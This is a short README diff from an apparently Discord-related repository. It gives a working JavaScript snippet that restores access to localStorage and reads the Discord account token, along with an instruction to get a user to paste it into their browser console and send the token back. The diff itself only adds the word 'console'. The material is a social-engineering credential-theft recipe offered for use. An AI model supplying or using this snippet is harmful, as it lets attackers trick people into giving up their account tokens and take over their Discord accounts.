ZakuroSoda/Discord-Matters/README.md

 ### Method 1: Get user to send you the token or get it yourself (JavaScript)

-Get user to copy and paste this code into browser and send you back the token.
+Get user to copy and paste this code into browser console and send you back the token.
 Token will be alerted in window and logged in console.

 ``` function getLocalStoragePropertyDescriptor() {const iframe = document.createElement('iframe');document.head.append(iframe);const pd = Object.getOwnPropertyDescriptor(iframe.contentWindow, 'localStorage');iframe.remove();return pd;} Object.defineProperty(window, 'localStorage', getLocalStoragePropertyDescriptor());console.log(localStorage.token); window.alert(localStorage.token); ```